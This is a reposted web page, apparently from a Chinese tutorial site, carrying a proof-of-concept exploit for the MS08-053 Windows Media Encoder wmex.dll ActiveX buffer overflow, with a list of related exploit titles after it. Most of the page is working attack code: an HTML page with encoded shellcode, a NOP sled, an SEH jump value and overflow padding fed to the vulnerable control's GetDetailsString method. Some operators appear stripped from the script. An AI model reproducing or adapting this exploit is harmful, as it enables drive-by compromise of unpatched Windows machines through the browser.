手机
当前位置:查字典教程网 >网络安全 >Exploit >Windows Media Encoder wmex.dll ActiveX BOF Exploit (MS08-053)
Windows Media Encoder wmex.dll ActiveX BOF Exploit (MS08-053)
摘要:======================================================================...

<html>

<pre> =============================================================================

MS08-053 Windows Media Encoder wmex.dll ActiveX Control Buffer Overflow

============================================================================= Calc execution POC Exploit for WinXP SP2 PRO English / IE6.0 SP2 Found by : Nguyen Minh Duc and Le Manh Tung

Advisory : http://www.microsoft.com/technet/security/Bulletin/MS08-053.mspx Exploit by : haluznik | haluznik<at>gmail.com 09.10.2008

============================================================================= <input language=JavaScript onclick=poc() type=button value="launch exploit"> <OBJECT id="target" classid="clsid:A8D3AD02-7508-4004-B2E9-AD33F087F43C">

</OBJECT> <script> function poc() { var shellcode = unescape(

"%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949%u4948%u4949"

"%u4949%u4949%u4949%u4949%u5a51%u436a%u3058%u3142%u4250%u6b41"

"%u4142%u4253%u4232%u3241%u4141%u4130%u5841%u3850%u4242%u4875"

"%u6b69%u4d4c%u6338%u7574%u3350%u6730%u4c70%u734b%u5775%u6e4c"

"%u636b%u454c%u6355%u3348%u5831%u6c6f%u704b%u774f%u6e68%u736b"

"%u716f%u6530%u6a51%u724b%u4e69%u366b%u4e54%u456b%u4a51%u464e"

"%u6b51%u4f70%u4c69%u6e6c%u5964%u7350%u5344%u5837%u7a41%u546a"

"%u334d%u7831%u4842%u7a6b%u7754%u524b%u6674%u3444%u6244%u5955"

"%u6e75%u416b%u364f%u4544%u6a51%u534b%u4c56%u464b%u726c%u4c6b"

"%u534b%u376f%u636c%u6a31%u4e4b%u756b%u6c4c%u544b%u4841%u4d6b"

"%u5159%u514c%u3434%u4a44%u3063%u6f31%u6230%u4e44%u716b%u5450"

"%u4b70%u6b35%u5070%u4678%u6c6c%u634b%u4470%u4c4c%u444b%u3530"

"%u6e4c%u6c4d%u614b%u5578%u6a58%u644b%u4e49%u6b6b%u6c30%u5770"

"%u5770%u4770%u4c70%u704b%u4768%u714c%u444f%u6b71%u3346%u6650"

"%u4f36%u4c79%u6e38%u4f63%u7130%u306b%u4150%u5878%u6c70%u534a"

"%u5134%u334f%u4e58%u3978%u6d6e%u465a%u616e%u4b47%u694f%u6377"

"%u4553%u336a%u726c%u3057%u5069%u626e%u7044%u736f%u4147%u4163"

"%u504c%u4273%u3159%u5063%u6574%u7035%u546d%u6573%u3362%u306c"

"%u4163%u7071%u536c%u6653%u314e%u7475%u7038%u7765%u4370"); var buff= "";

var nsp = unescape("%u06EB%u9090");

var sh = unescape("%u6950%u74C9");

var nop = unescape("%u9090%u9090%u9090%u9090%u9090%u9090"); for (i=0;i<1638;i ) buff=buff unescape("%u4141"); buff = buff nsp sh nop shellcode; target.GetDetailsString(buff,1);

} </script>

</pre>

</html>

【Windows Media Encoder wmex.dll ActiveX BOF Exploit (MS08-053)】相关文章:

Microsoft Access (Snapview.ocx 10.0.5529.0) ActiveX Remote Exploit

Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BOF Exploit

FlashGet 1.9.0.1012 (FTP PWD Response) BOF Exploit (safeseh)

Debian Sarge Multiple IMAP Server Denial of Service Exploit

Easy Photo Gallery 2.1 XSS/FD/Bypass/SQL Injection Exploit

BrowseDialog Class (ccrpbds6.dll) Internet Explorer Denial of Service

Download Accelerator Plus - DAP 8.x m3u File Buffer Overflow Exploit (c)

Microsoft DNS Server (Dynamic DNS Updates) Remote Exploit

Friendly Technologies (fwRemoteCfg.dll) ActiveX Command Exec Exploit

Microsoft Excel Malformed Palette Record DoS PoC (MS07-002)

精品推荐
分类导航